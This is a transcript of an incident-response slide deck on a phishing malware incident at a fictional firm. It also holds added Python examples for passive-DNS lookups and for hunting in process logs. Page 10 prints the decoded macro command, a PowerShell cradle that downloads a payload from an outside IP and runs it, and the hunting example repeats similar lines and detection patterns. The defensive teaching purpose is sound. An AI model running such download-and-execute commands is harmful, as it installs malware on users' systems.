Incident Response in the wake of Dear CEO

Uploaded by: paul-dutot-ieng-miet-mbcs-citp-oscp-cstm

Posted on 16-Apr-2017

TRANSCRIPT

Page 1: Incident Response in the wake of Dear CEO

Up your Game

In the wake of Dear CEO

Page 2

Who am I

• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP)
• Channel Islands Information Security Forum (CIISF) founder
• Secretary, British Computer Society Jersey
• My role is a mixture of offence and defence for clients of all sizes and verticals, including forensic malware investigations.

Page 3

How we got here

“We expect that registered persons will take appropriate steps to properly manage their cyber-security arrangements.”

The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks. A registered person should:

• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack
• Review these matters and test their effectiveness

Page 4

5 Key Questions – Incident Response

[1] Can we determine how many hosts talked to the bad domain, and when? How far back in time can we go to check / prove this?
[2] What information do we have available to us? Logs? Endpoint protection system?
[3] Did any of the affected hosts communicate with other network systems? If they did, what occurred?
[4] How long did it take us to detect and remedy the incident?
[5] What was the cost to the business?

Page 5

Incident Response Stages

Preparation → Incident → Identification → Eradication → Recovery → Lessons Learned

Without information, you cannot respond!!

The more information you have, the better your response.

Effective incident response is about being able to pivot quickly and direct your response accordingly.

Page 6

Meet Calculon Inc.

Office headcounts and time offsets (from the map on the slide):

Cayman = 50, BVI = 50 (100 staff, time = -5 hours)
Jersey = 180, Guernsey = 100, London = 20 (300 staff)
HK = 40, Kuala Lumpur = 30, Shanghai = 20 (90 staff, time = +8 hours)

Page 7

Preparation - Threat Model

Threat                          | Vulnerability                          | Impact                | Business Impact         | Controls
Email Phishing                  | Social Engineering                     | Possible Compromise   | System rebuild          | Logging, Anti Virus
Malvertising Attack             | Outdated Adobe Flash                   | Possible Compromise   | System rebuild          | Ad Blocker, Anti Virus
Web Attack against culculon.com | Vulnerability in web application stack | Website compromised   | Reputational Loss       | Keep website stack up to date
DDOS against Culculon.com       | Insufficient bandwidth                 | Website not available | Minor reputational loss | Consider DDOS protection

Page 8

Preparation - Cyber kill chain

“You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You can’t plan for that. That’s Life.”

Page 9

Incident – Malware Attack

Timeline (Day 1 to Day 7, November 2016)

Milestones:
11/11/2016 Phishing email received
11/11/2016 System cleanup started
11/14/2016 Systems cleanup completed

Actions:
11/11/2016 Identify infected systems
11/11/2016 Delete Citrix user profiles
11/11/2016 Disconnect infected systems from network
11/11/2016 - 11/14/2016 Rebuild infected systems
11/11/2016 Delete email from Exchange server
11/11/2016 Inform BVI/Cayman of the attack
11/14/2016 - 11/16/2016 Reporting
11/17/2016 Cost of incident

Page 10

Incident – Malware attack

It has code hidden in an Excel spreadsheet. When decoded it becomes…

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

VBA macro virus with hidden URL

Page 11

Incident – Lessons Learned

[1] Insufficient logging available
[2] “Triage” took too long
[3] Lack of support skills in locations outside the UK
[4] Volatile forensic data lost
[5] USB / DLP / drive encryption made analysis difficult
[6] AV showed no infection / incident response tools showed no malicious processes
[7] Reporting took too long

Page 12

Incident 1 – Business Cost

25 who clicked the email phish (Citrix = 12), in various locations:

• Jersey, Guernsey and London
• KL: Calculon partner
• HK: Calculon senior executive

12 x Citrix Users - £150 per hour – 6 Hours = £3,600
9 x Citrix Users - £200 per hour – 10 Hours = £18,000
4 x Citrix Users - £400 per hour – 5 Hours = £8,000
IT support Costs = £2,000

Total Cost = £31,600

Page 13

Improving Our Response – Passive DNS

https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/

[1] Cheap to set up
[2] Use ‘Bro’ with Critical Stack Intel – https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1
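Question 1 on slide 4 asks how many hosts talked to the bad domain and when, and how far back that can be proven; slide 13 says a passive DNS store answers it. The following is an added example, not code from the deck, that answers Question 1 over such a store. It assumes a simplified tab-separated record layout (ts, client, query, answers) rather than the real Bro dns.log columns, and runs over constructed records; it also matches subdomains of the bad domain, which generalises the single-domain case on the slide.

```python
"""Answer Key Question 1 from a passive DNS store. Records are constructed,
simplified dns.log-style lines: ts<TAB>client<TAB>query<TAB>answers."""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample records spanning three days; NOT real data.
PASSIVE_DNS = """\
1478822400.0\t10.1.20.15\tmail.example.org\t203.0.113.5
1478822460.0\t10.1.20.15\tbad-cdn.example.net\t198.51.100.7
1478822520.0\t10.1.20.44\tbad-cdn.example.net\t198.51.100.7
1478908800.0\t10.1.30.9\twww.example.com\t203.0.113.8
1478908860.0\t10.1.20.44\tbad-cdn.example.net\t198.51.100.7
1478995200.0\t10.1.30.9\tbad-cdn.example.net\t198.51.100.9
"""

def parse_records(text):
    """Yield (ts, client, query, answers) tuples, skipping comment lines."""
    for line in text.splitlines():
        if line and not line.startswith("#"):
            ts, client, query, answers = line.split("\t")
            yield float(ts), client, query.lower().rstrip("."), answers

def hosts_that_resolved(records, bad_domain):
    """Map each client that looked up bad_domain (or a subdomain) to its lookup times."""
    bad = bad_domain.lower()
    hits = defaultdict(list)
    for ts, client, query, _ in records:
        if query == bad or query.endswith("." + bad):
            hits[client].append(ts)
    return {client: sorted(times) for client, times in hits.items()}

def retention_window(records):
    """Earliest and latest record: how far back the store lets us prove anything."""
    stamps = [rec[0] for rec in records]
    return min(stamps), max(stamps)

def iso(ts):
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%SZ")

def report(text, bad_domain):
    """Print the Question 1 answer and return the per-host lookup times."""
    records = list(parse_records(text))
    hits = hosts_that_resolved(records, bad_domain)
    first, last = retention_window(records)
    print(f"Passive DNS covers {iso(first)} to {iso(last)}")
    print(f"{len(hits)} host(s) resolved {bad_domain}:")
    for client, times in sorted(hits.items()):
        print(f"  {client}: first {iso(times[0])}, last {iso(times[-1])}, {len(times)} lookup(s)")
    return hits

if __name__ == "__main__":
    report(PASSIVE_DNS, "bad-cdn.example.net")
```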

Page 14

Endpoint Logging

[1] Level One
• User login / logoff events
• User account creation, deletion and modification

[2] Level Two
• Process creation / termination on systems
• Use of sensitive privileges

[3] Must Have
• Logs must be stored centrally – avoids anti-forensic clearing of logs
• Available for historic querying and hunting of suspicious activity
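Slide 10's decoded macro command and the Level Two process-creation logging above fit together: with process creation stored centrally, the cradle's behaviours can be hunted for even when AV and live IR tools show nothing (lesson [6]). The following is an added example, not code from the deck. It assumes a simplified tab-separated event layout (ts, host, parent image, command line), constructed events with placeholder IPs, paths and hostnames, and the assumption that a macro-launched cradle has an Office application as its parent process.

```python
"""Hunt centrally stored process-creation logs for the macro download cradle
shown on slide 10. Events are constructed, simplified lines:
ts<TAB>host<TAB>parent_image<TAB>command_line (not the deck's own format)."""
import re

# Constructed sample events; IPs, paths and hostnames are placeholders.
PROCESS_LOG = """\
2016-11-11 09:02:11\tJER-WS-017\tEXCEL.EXE\tcmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://198.51.100.7/x/y/dxzq.jpg','%TEMP%\\JIOiodfhioIH.cab'); expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; start %TEMP%\\JIOiodfhioIH.exe;
2016-11-11 09:05:40\tJER-WS-017\texplorer.exe\tpowershell.exe -File C:\\Scripts\\inventory.ps1
2016-11-11 09:07:02\tGSY-WS-003\tEXCEL.EXE\tcmd /c echo hello
2016-11-11 09:09:55\tLON-CTX-01\tWINWORD.EXE\tPowerShell.exe -w hidden (New-Object Net.WebClient).DownloadFile('http://198.51.100.9/a.png','%TEMP%\\a.exe'); start %TEMP%\\a.exe
"""

# One regex per behaviour of the observed cradle, matched case-insensitively.
INDICATORS = {
    "webclient_download": re.compile(r"net\.webclient\)\.downloadfile", re.I),
    "disguised_extension": re.compile(r"downloadfile\('[^']+\.(?:jpg|png|gif|txt)'", re.I),
    "temp_expand_cab": re.compile(r"expand\s+%temp%\\\S+\.cab", re.I),
    "start_from_temp": re.compile(r"start\s+%temp%\\\S+\.exe", re.I),
}
# Assumption: a macro-launched cradle has an Office application as parent.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}

def parse_events(text):
    """Yield one dict per non-empty log line."""
    for line in text.splitlines():
        if line:
            ts, host, parent, cmd = line.split("\t", 3)
            yield {"ts": ts, "host": host, "parent": parent, "cmd": cmd}

def score_event(event):
    """Return the names of the indicators this event triggers."""
    hits = []
    if event["parent"].lower() in OFFICE_PARENTS and "powershell" in event["cmd"].lower():
        hits.append("office_spawns_powershell")
    hits += [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]
    return hits

def hunt(text, threshold=2):
    """Events triggering at least `threshold` indicators, as (host, ts, hits) tuples."""
    findings = []
    for ev in parse_events(text):
        hits = score_event(ev)
        if len(hits) >= threshold:
            findings.append((ev["host"], ev["ts"], hits))
    return findings

if __name__ == "__main__":
    for host, ts, hits in hunt(PROCESS_LOG):
        print(f"{ts} {host}: {', '.join(hits)}")
```

Requiring two or more indicators keeps a single legitimate PowerShell download from alerting on its own, while the full cradle trips all five.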

Page 15

Endpoint Forensics

[1] Directly examine the memory
• Not susceptible to malware tampering.
• More information available – malware can’t hide.

[2] Scalability
• We need to be able to ask questions of systems remotely.
• Allows us to pivot and focus on what needs to “get done” in an incident.

[3] Memory Samples
• Contain information as well as disk artefacts.
• Existing “Live IR” tools are insufficient.

Threat Hunting = Endpoint Logging + Forensics + Netflow

Page 16

ELK Stack Explained

Page 17

ELK Demo

Page 18

Google Rapid Response

• Cross-platform support for Linux, Mac OS X and Windows clients.
• Live remote memory analysis and imaging.
• Powerful search and download capabilities for files and the Windows registry.
• Secure communication infrastructure designed for Internet deployment.
• Detailed monitoring of client CPU, memory, IO usage and self-imposed limits.

https://github.com/google/grr

Page 19

Reporting / Compliance

https://github.com/certsocietegenerale/FIR

• Python / Django web application
• Open sourced by the Societe Generale Incident Response Team
• Customisable and freely available for you to record your incidents in
• GPL v3 licensed – you can make changes for your own use

Page 20

Canaries, Tokens and Honey Hashes

Canary Token: Something you put on your network; if it is opened, you get an email alert.

Canary Device: A honeypot with an Internet-hosted console that mimics some other system and creates alerts when accessed.

Honey Hash: A fake NTLM password hash that you put on critical servers to detect Pass The Hash attacks.

Page 21

Integrating SIEM into your response

• Endpoint logging and forensics integrated via event collectors
• Threat intelligence feeds directly integrated into SIEM
• AV / Next gen AV supported
• Passive DNS integrated

Page 22

Bridging the skills gap

Forensic Images: http://www.forensicfocus.com/images-and-challenges
Volatility Framework: http://volatility-labs.blogspot.com/
Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf

Page 23

Questions

Can your organisation prevent, detect and respond to cyber security threats that you face?

In an incident could you answer the five key questions?

@cyberkryption